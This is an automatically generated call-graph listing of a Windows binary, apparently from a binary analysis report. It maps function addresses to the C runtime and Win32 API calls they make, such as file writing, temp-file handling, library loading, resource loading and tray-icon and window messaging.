ae9de __setmbcp 54244->54245 54246 ae9fe 54245->54246 54247 ae9e6 54245->54247 54249 aea7b 54246->54249 54254 aea28 54246->54254 54427 a7bda 47 API calls __getptd_noexit 54247->54427 54431 a7bda 47 API calls __getptd_noexit 54249->54431 54250 ae9eb 54428 a7c0e 47 API calls __getptd_noexit 54250->54428 54253 aea80 54432 a7c0e 47 API calls __getptd_noexit 54253->54432 54257 aa8ed ___lock_fhandle 49 API calls 54254->54257 54255 ae9f3 __setmbcp 54255->54184 54259 aea2e 54257->54259 54258 aea88 54433 a6e10 8 API calls __wtof_l 54258->54433 54261 aea4c 54259->54261 54262 aea41 54259->54262 54429 a7c0e 47 API calls __getptd_noexit 54261->54429 54412 aea9c 54262->54412 54265 aea47 54430 aea73 LeaveCriticalSection __unlock_fhandle 54265->54430 54267->54175 54268->54172 54270 aaf6d __setmbcp 54269->54270 54271 aaf75 54270->54271 54274 aaf8d 54270->54274 54367 a7bda 47 API calls __getptd_noexit 54271->54367 54273 ab022 54372 a7bda 47 API calls __getptd_noexit 54273->54372 54274->54273 54279 aafbf 54274->54279 54275 aaf7a 54368 a7c0e 47 API calls __getptd_noexit 54275->54368 54278 ab027 54373 a7c0e 47 API calls __getptd_noexit 54278->54373 54294 aa8ed 54279->54294 54282 ab02f 54374 a6e10 8 API calls __wtof_l 54282->54374 54283 aafc5 54285 aafeb 54283->54285 54286 aafd8 54283->54286 54369 a7c0e 47 API calls __getptd_noexit 54285->54369 54303 ab043 54286->54303 54289 aaf82 __setmbcp 54289->54232 54290 aaff0 54370 a7bda 47 API calls __getptd_noexit 54290->54370 54291 aafe4 54371 ab01a LeaveCriticalSection __unlock_fhandle 54291->54371 54295 aa8f9 __setmbcp 54294->54295 54296 aa946 EnterCriticalSection 54295->54296 54298 a7cf4 __lock 47 API calls 54295->54298 54297 aa96c __setmbcp 54296->54297 54297->54283 54299 aa91d 54298->54299 54300 aa93a 54299->54300 54301 aa928 InitializeCriticalSectionAndSpinCount 54299->54301 54375 aa970 LeaveCriticalSection _doexit 54300->54375 54301->54300 54304 ab050 __ftell_nolock 54303->54304 54305 ab082 54304->54305 54306 ab0ac 54304->54306 54307 ab08d 54304->54307 54399 aa70c 54305->54399 54310 ab105 54306->54310 54311 ab0e9 54306->54311 54385 a7bda 47 API calls __getptd_noexit 54307->54385 54314 ab11c 54310->54314 54391 af82f 49 API calls 3 library calls 54310->54391 54388 a7bda 47 API calls __getptd_noexit 54311->54388 54312 ab86b 54312->54291 54313 ab092 54386 a7c0e 47 API calls __getptd_noexit 54313->54386 54376 b3bf2 54314->54376 54318 ab099 54387 a6e10 8 API calls __wtof_l 54318->54387 54320 ab0ee 54389 a7c0e 47 API calls __getptd_noexit 54320->54389 54322 ab12a 54324 ab44b 54322->54324 54392 a7a0d 47 API calls 2 library calls 54322->54392 54326 ab7b8 WriteFile 54324->54326 54327 ab463 54324->54327 54325 ab0f5 54390 a6e10 8 API calls __wtof_l 54325->54390 54329 ab7e1 GetLastError 54326->54329 54336 ab410 54326->54336 54331 ab55a 54327->54331 54339 ab479 54327->54339 54329->54336 54341 ab663 54331->54341 54344 ab565 54331->54344 54332 ab150 GetConsoleMode 54332->54324 54334 ab189 54332->54334 54333 ab81b 54333->54305 54397 a7c0e 47 API calls __getptd_noexit 54333->54397 54334->54324 54337 ab199 GetConsoleCP 54334->54337 54336->54305 54336->54333 54343 ab7f7 54336->54343 54337->54336 54362 ab1c2 54337->54362 54338 ab4e9 WriteFile 54338->54329 54340 ab526 54338->54340 54339->54333 54339->54338 54340->54336 54340->54339 54350 ab555 54340->54350 54341->54333 54345 ab6d8 WideCharToMultiByte 54341->54345 54342 ab843 54398 a7bda 47 API calls __getptd_noexit 54342->54398 54347 ab7fe 54343->54347 54348 ab812 54343->54348 54344->54333 54349 ab5de WriteFile 54344->54349 54345->54329 54360 ab71f 54345->54360 54394 a7c0e 47 API calls __getptd_noexit 54347->54394 54396 a7bed 47 API calls 3 library calls 54348->54396 54349->54329 54353 ab62d 54349->54353 54350->54336 54353->54336 54353->54344 54353->54350 54354 ab727 WriteFile 54357 ab77a GetLastError 54354->54357 54354->54360 54355 ab803 54395 a7bda 47 API calls __getptd_noexit 54355->54395 54357->54360 54359 b40f7 59 API calls __chsize_nolock 54359->54362 54360->54336 54360->54341 54360->54350 54360->54354 54361 b5884 WriteConsoleW CreateFileW __chsize_nolock 54364 ab2f6 54361->54364 54362->54336 54362->54359 54363 ab28f WideCharToMultiByte 54362->54363 54362->54364 54393 a1688 57 API calls __isleadbyte_l 54362->54393 54363->54336 54365 ab2ca WriteFile 54363->54365 54364->54329 54364->54336 54364->54361 54364->54362 54366 ab321 WriteFile 54364->54366 54365->54329 54365->54364 54366->54329 54366->54364 54367->54275 54368->54289 54369->54290 54370->54291 54371->54289 54372->54278 54373->54282 54374->54289 54375->54296 54377 b3c0a 54376->54377 54378 b3bfd 54376->54378 54381 b3c16 54377->54381 54407 a7c0e 47 API calls __getptd_noexit 54377->54407 54406 a7c0e 47 API calls __getptd_noexit 54378->54406 54380 b3c02 54380->54322 54381->54322 54383 b3c37 54408 a6e10 8 API calls __wtof_l 54383->54408 54385->54313 54386->54318 54387->54305 54388->54320 54389->54325 54390->54305 54391->54314 54392->54332 54393->54362 54394->54355 54395->54305 54396->54305 54397->54342 54398->54305 54400 aa716 IsProcessorFeaturePresent 54399->54400 54401 aa714 54399->54401 54403 b37b0 54400->54403 54401->54312 54409 b375f 5 API calls 2 library calls 54403->54409 54405 b3893 54405->54312 54406->54380 54407->54383 54408->54380 54409->54405 54410->54241 54411->54243 54434 aaba4 54412->54434 54414 aeb00 54447 aab1e 48 API calls 2 library calls 54414->54447 54416 aeaaa 54416->54414 54417 aeade 54416->54417 54420 aaba4 __chsize_nolock 47 API calls 54416->54420 54417->54414 54418 aaba4 __chsize_nolock 47 API calls 54417->54418 54422 aeaea CloseHandle 54418->54422 54419 aeb08 54423 aeb2a 54419->54423 54448 a7bed 47 API calls 3 library calls 54419->54448 54421 aead5 54420->54421 54424 aaba4 __chsize_nolock 47 API calls 54421->54424 54422->54414 54425 aeaf6 GetLastError 54422->54425 54423->54265 54424->54417 54425->54414 54427->54250 54428->54255 54429->54265 54430->54255 54431->54253 54432->54258 54433->54255 54435 aabaf 54434->54435 54436 aabc4 54434->54436 54449 a7bda 47 API calls __getptd_noexit 54435->54449 54440 aabe9 54436->54440 54451 a7bda 47 API calls __getptd_noexit 54436->54451 54439 aabb4 54450 a7c0e 47 API calls __getptd_noexit 54439->54450 54440->54416 54441 aabf3 54452 a7c0e 47 API calls __getptd_noexit 54441->54452 54443 aabbc 54443->54416 54445 aabfb 54453 a6e10 8 API calls __wtof_l 54445->54453 54447->54419 54448->54423 54449->54439 54450->54443 54451->54441 54452->54445 54453->54443 54455 c6529 54454->54455 54456 c6cc4 FindFirstFileW 54454->54456 54455->54042 54456->54455 54457 c6cd9 FindClose 54456->54457 54457->54455 54487 86b0f 54458->54487 54460 8b69b 54500 8ba85 48 API calls ___crtGetEnvironmentStringsW 54460->54500 54462 8b6b5 54462->54103 54465 f3939 ___crtGetEnvironmentStringsW 54515 c26bc 88 API calls 3 library calls 54465->54515 54466 8bcce 48 API calls 54469 8b495 54466->54469 54467 f397b 54516 c26bc 88 API calls 3 library calls 54467->54516 54469->54460 54469->54465 54469->54466 54469->54467 54473 8ba85 48 API calls 54469->54473 54477 8b9e4 54469->54477 54478 f3909 54469->54478 54492 8c413 59 API calls 54469->54492 54493 8bb85 54469->54493 54498 8bdfa 48 API calls ___crtGetEnvironmentStringsW 54469->54498 54499 8bc74 48 API calls 54469->54499 54501 8c6a5 49 API calls 54469->54501 54502 8c799 48 API calls ___crtGetEnvironmentStringsW 54469->54502 54472 f3973 54472->54462 54473->54469 54475 f3989 54517 8ba85 48 API calls ___crtGetEnvironmentStringsW 54475->54517 54518 c26bc 88 API calls 3 library calls 54477->54518 54503 86b4a 54478->54503 54481 f3914 54506 9f4ea 54481->54506 54484 8b66c CharUpperBuffW 54484->54469 54486->54105 54488 9f4ea 48 API calls 54487->54488 54489 86b34 54488->54489 54490 86b4a 48 API calls 54489->54490 54491 86b43 54490->54491 54491->54469 54492->54469 54494 8bb9b 54493->54494 54497 8bb96 ___crtGetEnvironmentStringsW 54493->54497 54496 f1b77 54494->54496 54519 9ee75 54494->54519 54496->54496 54497->54469 54498->54484 54499->54469 54500->54462 54501->54469 54502->54469 54504 9f4ea 48 API calls 54503->54504 54505 86b54 54504->54505 54505->54481 54509 9f4f2 __calloc_impl 54506->54509 54507 a395c __crtGetStringTypeA_stat 47 API calls 54507->54509 54508 9f50c 54508->54465 54509->54507 54509->54508 54510 9f50e std::exception::exception 54509->54510 54550 a6805 RaiseException 54510->54550 54512 9f538 54551 a673b 47 API calls _free 54512->54551 54514 9f54a 54514->54465 54515->54472 54516->54475 54517->54472 54518->54472 54521 9f4ea __calloc_impl 54519->54521 54522 9f50c 54521->54522 54523 9f50e std::exception::exception 54521->54523 54528 a395c 54521->54528 54522->54497 54542 a6805 RaiseException 54523->54542 54525 9f538 54543 a673b 47 API calls _free 54525->54543 54527 9f54a 54527->54497 54529 a39d7 __calloc_impl 54528->54529 54533 a3968 __calloc_impl 54528->54533 54549 a7c0e 47 API calls __getptd_noexit 54529->54549 54532 a399b RtlAllocateHeap 54532->54533 54541 a39cf 54532->54541 54533->54532 54535 a39c3 54533->54535 54536 a3973 54533->54536 54539 a39c1 54533->54539 54547 a7c0e 47 API calls __getptd_noexit 54535->54547 54536->54533 54544 a81c2 47 API calls 2 library calls 54536->54544 54545 a821f 47 API calls 6 library calls 54536->54545 54546 a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 54536->54546 54548 a7c0e 47 API calls __getptd_noexit 54539->54548 54541->54521 54542->54525 54543->54527 54544->54536 54545->54536 54547->54539 54548->54541 54549->54541 54550->54512 54551->54514 54630 84214 54552->54630 54557 f4f73 54559 84252 84 API calls 54557->54559 54558 841d4 LoadLibraryExW 54640 84291 54558->54640 54561 f4f7a 54559->54561 54563 84291 3 API calls 54561->54563 54565 f4f82 54563->54565 54666 844ed 54565->54666 54566 841fb 54566->54565 54567 84207 54566->54567 54568 84252 84 API calls 54567->54568 54570 8420c 54568->54570 54570->54117 54570->54119 54573 f4fa9 54674 84950 54573->54674 54577 cbfb1 __ftell_nolock 54576->54577 54578 9f4ea 48 API calls 54577->54578 54579 cc00e 54578->54579 54580 847b7 48 API calls 54579->54580 54581 cc018 54580->54581 54582 cbdb4 GetSystemTimeAsFileTime 54581->54582 54583 cc023 54582->54583 54584 84517 83 API calls 54583->54584 54585 cc036 _wcscmp 54584->54585 54586 cc05a 54585->54586 54587 cc107 54585->54587 55003 cc56d 54586->55003 54589 cc56d 94 API calls 54587->54589 54598 cc05f _wcscat __wsplitpath _wcscpy 54589->54598 54590 844ed 64 API calls 54592 cc12c 54590->54592 54591 cc110 54591->54141 54593 844ed 64 API calls 54592->54593 54594 cc13c 54593->54594 54595 844ed 64 API calls 54594->54595 54596 cc157 54595->54596 54597 844ed 64 API calls 54596->54597 54599 cc167 54597->54599 54598->54590 54598->54591 54600 844ed 64 API calls 54599->54600 54601 cc182 54600->54601 54602 844ed 64 API calls 54601->54602 54603 cc192 54602->54603 54604 844ed 64 API calls 54603->54604 54605 cc1a2 54604->54605 54606 844ed 64 API calls 54605->54606 54607 cc1b2 54606->54607 54986 cc71a GetTempPathW GetTempFileNameW 54607->54986 54609 cc1be 54610 a3499 117 API calls 54609->54610 54612 cc1cf 54610->54612 54611 a35e4 __fcloseall 83 API calls 54613 cc294 54611->54613 54612->54591 54614 844ed 64 API calls 54612->54614 54625 cc289 54612->54625 54987 a2aae 54612->54987 54615 cc2ae 54613->54615 54616 cc29a DeleteFileW 54613->54616 54614->54612 54617 cc2b8 54615->54617 54618 cc342 CopyFileW 54615->54618 54616->54591 55009 cb965 118 API calls __fcloseall 54617->55009 54619 cc358 DeleteFileW 54618->54619 54620 cc36a DeleteFileW 54618->54620 54619->54591 55000 cc6d9 CreateFileW 54620->55000 54624 cc32d 54624->54620 54626 cc331 DeleteFileW 54624->54626 54625->54611 54626->54591 54627->54108 54628->54128 54629->54134 54679 84339 54630->54679 54633 8423c 54635 841bb 54633->54635 54636 84244 FreeLibrary 54633->54636 54637 a3499 54635->54637 54636->54635 54687 a34ae 54637->54687 54639 841c8 54639->54557 54639->54558 54903 842e4 54640->54903 54644 841ec 54647 84380 54644->54647 54645 842c1 FreeLibrary 54645->54644 54646 842b8 54646->54644 54646->54645 54648 9f4ea 48 API calls 54647->54648 54649 84395 54648->54649 54911 847b7 54649->54911 54651 843a1 ___crtGetEnvironmentStringsW 54652 843dc 54651->54652 54654 84499 54651->54654 54655 844d1 54651->54655 54653 84950 57 API calls 54652->54653 54661 843e5 54653->54661 54914 8406b CreateStreamOnHGlobal 54654->54914 54925 cc750 93 API calls 54655->54925 54658 844ed 64 API calls 54658->54661 54660 84479 54660->54566 54661->54658 54661->54660 54662 f4ed7 54661->54662 54920 84517 54661->54920 54663 84517 83 API calls 54662->54663 54664 f4eeb 54663->54664 54665 844ed 64 API calls 54664->54665 54665->54660 54667 844ff 54666->54667 54668 f4fc0 54666->54668 54943 a381e 54667->54943 54671 cbf5a 54963 cbdb4 54671->54963 54673 cbf70 54673->54573 54675 8495f 54674->54675 54678 f5002 54674->54678 54968 a3e65 54675->54968 54677 84967 54683 8434b 54679->54683 54682 84321 LoadLibraryA GetProcAddress 54682->54633 54684 8422f 54683->54684 54685 84354 LoadLibraryA 54683->54685 54684->54633 54684->54682 54685->54684 54686 84365 GetProcAddress 54685->54686 54686->54684 54690 a34ba __setmbcp 54687->54690 54688 a34cd 54735 a7c0e 47 API calls __getptd_noexit 54688->54735 54690->54688 54692 a34fe 54690->54692 54691 a34d2 54736 a6e10 8 API calls __wtof_l 54691->54736 54706 ae4c8 54692->54706 54695 a3503 54696 a3519 54695->54696 54697 a350c 54695->54697 54699 a3543 54696->54699 54700 a3523 54696->54700 54737 a7c0e 47 API calls __getptd_noexit 54697->54737 54720 ae5e0 54699->54720 54738 a7c0e 47 API calls __getptd_noexit 54700->54738 54701 a34dd @_EH4_CallFilterFunc@8 __setmbcp 54701->54639 54707 ae4d4 __setmbcp 54706->54707 54708 a7cf4 __lock 47 API calls 54707->54708 54709 ae4e2 54708->54709 54710 ae559 54709->54710 54716 a7d7c __mtinitlocknum 47 API calls 54709->54716 54718 ae552 54709->54718 54743 a4e5b 48 API calls __lock 54709->54743 54744 a4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 54709->54744 54745 a69d0 47 API calls __crtGetStringTypeA_stat 54710->54745 54713 ae560 54714 ae56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 54713->54714 54713->54718 54714->54718 54715 ae5cc __setmbcp 54715->54695 54716->54709 54740 ae5d7 54718->54740 54721 ae600 __wopenfile 54720->54721 54722 ae61a 54721->54722 54734 ae7d5 54721->54734 54752 a185b 59 API calls 2 library calls 54721->54752 54750 a7c0e 47 API calls __getptd_noexit 54722->54750 54724 ae61f 54751 a6e10 8 API calls __wtof_l 54724->54751 54726 a354e 54739 a3570 LeaveCriticalSection LeaveCriticalSection _fseek 54726->54739 54727 ae838 54747 b63c9 54727->54747 54730 ae7ce 54730->54734 54753 a185b 59 API calls 2 library calls 54730->54753 54732 ae7ed 54732->54734 54754 a185b 59 API calls 2 library calls 54732->54754 54734->54722 54734->54727 54735->54691 54736->54701 54737->54701 54738->54701 54739->54701 54746 a7e58 LeaveCriticalSection 54740->54746 54742 ae5de 54742->54715 54743->54709 54744->54709 54745->54713 54746->54742 54755 b5bb1 54747->54755 54749 b63e2 54749->54726 54750->54724 54751->54726 54752->54730 54753->54732 54754->54734 54758 b5bbd __setmbcp 54755->54758 54756 b5bcf 54842 a7c0e 47 API calls __getptd_noexit 54756->54842 54758->54756 54760 b5c06 54758->54760 54759 b5bd4 54843 a6e10 8 API calls __wtof_l 54759->54843 54766 b5c78 54760->54766 54763 b5c23 54844 b5c4c LeaveCriticalSection __unlock_fhandle 54763->54844 54765 b5bde __setmbcp 54765->54749 54767 b5c98 54766->54767 54845 a273b 54767->54845 54771 b5cb4 54773 b5cee 54771->54773 54777 b5d11 54771->54777 54789 b5deb 54771->54789 54772 b5bb1 __wsopen_helper 104 API calls 54774 b63e2 54772->54774 54883 a7bda 47 API calls __getptd_noexit 54773->54883 54774->54763 54776 b5cf3 54884 a7c0e 47 API calls __getptd_noexit 54776->54884 54780 b5dcf 54777->54780 54788 b5dad 54777->54788 54779 b5d00 54885 a6e10 8 API calls __wtof_l 54779->54885 54886 a7bda 47 API calls __getptd_noexit 54780->54886 54783 b5d0a 54783->54763 54784 b5dd4 54887 a7c0e 47 API calls __getptd_noexit 54784->54887 54786 b5de1 54888 a6e10 8 API calls __wtof_l 54786->54888 54852 aa979 54788->54852 54877 a6e20 IsProcessorFeaturePresent 54789->54877 54791 b5e7b 54792 b5ea6 54791->54792 54793 b5e85 54791->54793 54870 b5b20 54792->54870 54889 a7bda 47 API calls __getptd_noexit 54793->54889 54796 b5e8a 54890 a7c0e 47 API calls __getptd_noexit 54796->54890 54798 b5f46 GetFileType 54800 b5f93 54798->54800 54801 b5f51 GetLastError 54798->54801 54799 b5e94 54891 a7c0e 47 API calls __getptd_noexit 54799->54891 54896 aac0b 48 API calls 2 library calls 54800->54896 54894 a7bed 47 API calls 3 library calls 54801->54894 54802 b5f14 GetLastError 54892 a7bed 47 API calls 3 library calls 54802->54892 54807 b5f78 CloseHandle 54809 b5f39 54807->54809 54810 b5f86 54807->54810 54808 b5b20 ___createFile 3 API calls 54811 b5f09 54808->54811 54893 a7c0e 47 API calls __getptd_noexit 54809->54893 54895 a7c0e 47 API calls __getptd_noexit 54810->54895 54811->54798 54811->54802 54815 b5f8b 54815->54809 54816 b616c 54816->54789 54819 b633f CloseHandle 54816->54819 54817 b5fb1 54817->54816 54833 b6032 54817->54833 54897 af82f 49 API calls 3 library calls 54817->54897 54821 b5b20 ___createFile 3 API calls 54819->54821 54820 b601b 54839 b603a 54820->54839 54898 a7bda 47 API calls __getptd_noexit 54820->54898 54822 b6366 54821->54822 54824 b636e GetLastError 54822->54824 54825 b61f6 54822->54825 54901 a7bed 47 API calls 3 library calls 54824->54901 54825->54789 54827 b637a 54902 aab1e 48 API calls 2 library calls 54827->54902 54828 aea9c __close_nolock 50 API calls 54828->54839 54829 aee0e 59 API calls __filbuf 54829->54839 54832 aaf61 __flswbuf 78 API calls 54832->54833 54833->54816 54833->54832 54835 af82f 49 API calls __lseeki64_nolock 54833->54835 54833->54839 54834 b61e9 54836 aea9c __close_nolock 50 API calls 54834->54836 54835->54833 54838 b61f0 54836->54838 54837 b61d2 54837->54816 54900 a7c0e 47 API calls __getptd_noexit 54838->54900 54839->54828 54839->54829 54839->54833 54839->54834 54839->54837 54840 af82f 49 API calls __lseeki64_nolock 54839->54840 54899 b6f40 81 API calls 4 library calls 54839->54899 54840->54839 54842->54759 54843->54765 54844->54765 54846 a275a 54845->54846 54847 a2745 54845->54847 54846->54771 54848 a7c0e __wtof_l 47 API calls 54847->54848 54849 a274a 54848->54849 54850 a6e10 __wtof_l 8 API calls 54849->54850 54851 a2755 54850->54851 54851->54771 54853 aa985 __setmbcp 54852->54853 54854 a7d7c __mtinitlocknum 47 API calls 54853->54854 54855 aa996 54854->54855 54856 a7cf4 __lock 47 API calls 54855->54856 54857 aa99b __setmbcp 54855->54857 54867 aa9a9 54856->54867 54857->54791 54858 aab15 __wsopen_helper LeaveCriticalSection 54858->54857 54859 aaa85 54860 a6986 __calloc_crt 47 API calls 54859->54860 54864 aaa8e 54860->54864 54861 aaa25 EnterCriticalSection 54863 aaa35 LeaveCriticalSection 54861->54863 54861->54867 54862 a7cf4 __lock 47 API calls 54862->54867 54863->54867 54865 aa8ed ___lock_fhandle 49 API calls 54864->54865 54869 aaaf3 54864->54869 54865->54869 54866 aaa03 InitializeCriticalSectionAndSpinCount 54866->54867 54867->54859 54867->54861 54867->54862 54867->54866 54868 aaa4d __wsopen_helper LeaveCriticalSection 54867->54868 54867->54869 54868->54867 54869->54858 54871 b5b2c __threadstartex@4 54870->54871 54872 b5b30 GetModuleHandleW GetProcAddress 54871->54872 54875 b5b52 __threadstartex@4 54871->54875 54873 b5b4d 54872->54873 54872->54875 54874 b5b61 54873->54874 54874->54798 54874->54802 54874->54808 54875->54874 54876 b5b93 CreateFileW 54875->54876 54876->54874 54878 a6e2b 54877->54878 54879 a6cb5 __call_reportfault 7 API calls 54878->54879 54880 a6e40 54879->54880 54881 a8197 __invoke_watson GetCurrentProcess TerminateProcess 54880->54881 54882 a6e46 54881->54882 54882->54772 54883->54776 54884->54779 54885->54783 54886->54784 54887->54786 54888->54789 54889->54796 54890->54799 54891->54783 54892->54809 54893->54789 54894->54807 54895->54815 54896->54817 54897->54820 54898->54833 54899->54839 54900->54825 54901->54827 54902->54825 54907 842f6 54903->54907 54906 842cc LoadLibraryA GetProcAddress 54906->54646 54908 842aa 54907->54908 54909 842ff LoadLibraryA 54907->54909 54908->54646 54908->54906 54909->54908 54910 84310 GetProcAddress 54909->54910 54910->54908 54912 9f4ea 48 API calls 54911->54912 54913 847c9 54912->54913 54913->54651 54915 84085 FindResourceExW 54914->54915 54919 840a2 54914->54919 54916 f4f16 LoadResource 54915->54916 54915->54919 54917 f4f2b SizeofResource 54916->54917 54916->54919 54918 f4f3f LockResource 54917->54918 54917->54919 54918->54919 54919->54652 54921 84526 54920->54921 54922 f4fe0 54920->54922 54926 a3a8d 54921->54926 54924 84534 54924->54661 54925->54652 54929 a3a99 __setmbcp 54926->54929 54927 a3aa7 54939 a7c0e 47 API calls __getptd_noexit 54927->54939 54928 a3acd 54931 a4e1c __lock_file 48 API calls 54928->54931 54929->54927 54929->54928 54933 a3ad3 54931->54933 54932 a3aac 54940 a6e10 8 API calls __wtof_l 54932->54940 54941 a39fe 81 API calls 4 library calls 54933->54941 54936 a3ae2 54942 a3b04 LeaveCriticalSection LeaveCriticalSection _fseek 54936->54942 54938 a3ab7 __setmbcp 54938->54924 54939->54932 54940->54938 54941->54936 54942->54938 54946 a3839 54943->54946 54945 84510 54945->54671 54947 a3845 __setmbcp 54946->54947 54948 a385b _memset 54947->54948 54949 a3888 54947->54949 54950 a3880 __setmbcp 54947->54950 54959 a7c0e 47 API calls __getptd_noexit 54948->54959 54951 a4e1c __lock_file 48 API calls 54949->54951 54950->54945 54953 a388e 54951->54953 54961 a365b 62 API calls 5 library calls 54953->54961 54954 a3875 54960 a6e10 8 API calls __wtof_l 54954->54960 54957 a38a4 54962 a38c2 LeaveCriticalSection LeaveCriticalSection _fseek 54957->54962 54959->54954 54960->54950 54961->54957 54962->54950 54966 a344a GetSystemTimeAsFileTime 54963->54966 54965 cbdc3 54965->54673 54967 a3478 __aulldiv 54966->54967 54967->54965 54969 a3e71 __setmbcp 54968->54969 54970 a3e7f 54969->54970 54971 a3e94 54969->54971 54982 a7c0e 47 API calls __getptd_noexit 54970->54982 54973 a4e1c __lock_file 48 API calls 54971->54973 54974 a3e9a 54973->54974 54984 a3b0c 55 API calls 4 library calls 54974->54984 54975 a3e84 54983 a6e10 8 API calls __wtof_l 54975->54983 54978 a3ea5 54985 a3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 54978->54985 54980 a3eb7 54981 a3e8f __setmbcp 54980->54981 54981->54677 54982->54975 54983->54981 54984->54978 54985->54980 54986->54609 54988 a2aba __setmbcp 54987->54988 54989 a2ae4 __setmbcp 54988->54989 54990 a2aec 54988->54990 54991 a2ad4 54988->54991 54989->54612 54993 a4e1c __lock_file 48 API calls 54990->54993 55022 a7c0e 47 API calls __getptd_noexit 54991->55022 54995 a2af2 54993->54995 54994 a2ad9 55023 a6e10 8 API calls __wtof_l 54994->55023 55010 a2957 54995->55010 55001 cc6ff SetFileTime CloseHandle 55000->55001 55002 cc715 55000->55002 55001->55002 55002->54591 55008 cc581 __tzset_nolock _wcscmp 55003->55008 55004 844ed 64 API calls 55004->55008 55005 cc6cb 55005->54598 55006 cbf5a GetSystemTimeAsFileTime 55006->55008 55007 84517 83 API calls 55007->55008 55008->55004 55008->55005 55008->55006 55008->55007 55009->54624 55013 a2966 55010->55013 55016 a2984 55010->55016 55011 a2974 55025 a7c0e 47 API calls __getptd_noexit 55011->55025 55013->55011 55013->55016 55018 a299c ___crtGetEnvironmentStringsW 55013->55018 55014 a2979 55026 a6e10 8 API calls __wtof_l 55014->55026 55024 a2b24 LeaveCriticalSection LeaveCriticalSection _fseek 55016->55024 55018->55016 55019 a2c84 __flush 78 API calls 55018->55019 55020 a2933 __flswbuf 47 API calls 55018->55020 55021 aaf61 __flswbuf 78 API calls 55018->55021 55027 a8e63 78 API calls 4 library calls 55018->55027 55019->55018 55020->55018 55021->55018 55022->54994 55023->54989 55024->54989 55025->55014 55026->55016 55027->55018 55028->54068 55029->54068 55030 82322 55031 82344 55030->55031 55063 826df 55031->55063 55038 8d7f7 48 API calls 55039 8238e 55038->55039 55040 8d7f7 48 API calls 55039->55040 55041 82398 55040->55041 55042 8d7f7 48 API calls 55041->55042 55043 823de 55042->55043 55044 8d7f7 48 API calls 55043->55044 55045 824c1 55044->55045 55076 8263f 55045->55076 55049 824f1 55050 8d7f7 48 API calls 55049->55050 55051 824fb 55050->55051 55105 82745 55051->55105 55053 82546 55054 82556 GetStdHandle 55053->55054 55055 f501d 55054->55055 55056 825b1 55054->55056 55055->55056 55058 f5026 55055->55058 55057 825b7 CoInitialize 55056->55057 55112 c92d4 53 API calls 55058->55112 55060 f502d 55113 c99f9 CreateThread 55060->55113 55062 f5039 CloseHandle 55062->55057 55114 82854 55063->55114 55067 8234a 55068 8272e 55067->55068 55145 827ec 6 API calls 55068->55145 55070 8237a 55071 8d7f7 55070->55071 55072 9f4ea 48 API calls 55071->55072 55073 8d818 55072->55073 55074 9f4ea 48 API calls 55073->55074 55075 82384 55074->55075 55075->55038 55077 8d7f7 48 API calls 55076->55077 55078 8264f 55077->55078 55079 8d7f7 48 API calls 55078->55079 55080 82657 55079->55080 55146 826a7 55080->55146 55083 826a7 48 API calls 55084 82667 55083->55084 55085 8d7f7 48 API calls 55084->55085 55086 82672 55085->55086 55087 9f4ea 48 API calls 55086->55087 55088 824cb 55087->55088 55089 822a4 55088->55089 55090 822b2 55089->55090 55091 8d7f7 48 API calls 55090->55091 55092 822bd 55091->55092 55093 8d7f7 48 API calls 55092->55093 55094 822c8 55093->55094 55095 8d7f7 48 API calls 55094->55095 55096 822d3 55095->55096 55097 8d7f7 48 API calls 55096->55097 55098 822de 55097->55098 55099 826a7 48 API calls 55098->55099 55100 822e9 55099->55100 55101 9f4ea 48 API calls 55100->55101 55102 822f0 55101->55102 55103 822f9 RegisterWindowMessageW 55102->55103 55104 f1fe7 55102->55104 55103->55049 55106 f5f4d 55105->55106 55107 82755 55105->55107 55151 cc942 50 API calls 55106->55151 55109 9f4ea 48 API calls 55107->55109 55111 8275d 55109->55111 55110 f5f58 55111->55053 55112->55060 55113->55062 55152 c99df 54 API calls 55113->55152 55132 82870 55114->55132 55117 82870 48 API calls 55118 82864 55117->55118 55119 8d7f7 48 API calls 55118->55119 55120 82716 55119->55120 55121 86a63 55120->55121 55122 86adf 55121->55122 55124 86a6f __NMSG_WRITE 55121->55124 55140 8b18b 55122->55140 55125 86a8b 55124->55125 55126 86ad7 55124->55126 55127 86b4a 48 API calls 55125->55127 55139 8c369 48 API calls 55126->55139 55129 86a95 55127->55129 55131 9ee75 48 API calls 55129->55131 55130 86ab6 ___crtGetEnvironmentStringsW 55130->55067 55131->55130 55133 8d7f7 48 API calls 55132->55133 55134 8287b 55133->55134 55135 8d7f7 48 API calls 55134->55135 55136 82883 55135->55136 55137 8d7f7 48 API calls 55136->55137 55138 8285c 55137->55138 55138->55117 55139->55130 55141 8b1a2 ___crtGetEnvironmentStringsW 55140->55141 55142 8b199 55140->55142 55141->55130 55142->55141 55144 8bdfa 48 API calls ___crtGetEnvironmentStringsW 55142->55144 55144->55141 55145->55070 55147 8d7f7 48 API calls 55146->55147 55148 826b0 55147->55148 55149 8d7f7 48 API calls 55148->55149 55150 8265f 55149->55150 55150->55083 55151->55110 55153 83742 55154 8374b 55153->55154 55155 837c8 55154->55155 55156 83769 55154->55156 55193 837c6 55154->55193 55158 837ce 55155->55158 55159 f1e00 55155->55159 55160 8382c PostQuitMessage 55156->55160 55161 83776 55156->55161 55157 837ab DefWindowProcW 55194 837b9 55157->55194 55162 837d3 55158->55162 55163 837f6 SetTimer RegisterWindowMessageW 55158->55163 55202 82ff6 16 API calls 55159->55202 55160->55194 55165 f1e88 55161->55165 55166 83781 55161->55166 55167 837da KillTimer 55162->55167 55168 f1da3 55162->55168 55170 8381f CreatePopupMenu 55163->55170 55163->55194 55217 c4ddd 60 API calls _memset 55165->55217 55171 83789 55166->55171 55172 83836 55166->55172 55198 83847 Shell_NotifyIconW _memset 55167->55198 55174 f1ddc MoveWindow 55168->55174 55175 f1da8 55168->55175 55169 f1e27 55203 9e312 56 API calls 55169->55203 55170->55194 55178 f1e6d 55171->55178 55179 83794 55171->55179 55200 9eb83 53 API calls _memset 55172->55200 55174->55194 55181 f1dac 55175->55181 55182 f1dcb SetFocus 55175->55182 55178->55157 55216 ba5f3 48 API calls 55178->55216 55184 8379f 55179->55184 55185 f1e58 55179->55185 55181->55184 55188 f1db5 55181->55188 55182->55194 55183 837ed 55199 8390f DeleteObject DestroyWindow 55183->55199 55184->55157 55204 83847 Shell_NotifyIconW _memset 55184->55204 55215 c55bd 70 API calls _memset 55185->55215 55186 f1e9a 55186->55157 55186->55194 55187 83845 55187->55194 55201 82ff6 16 API 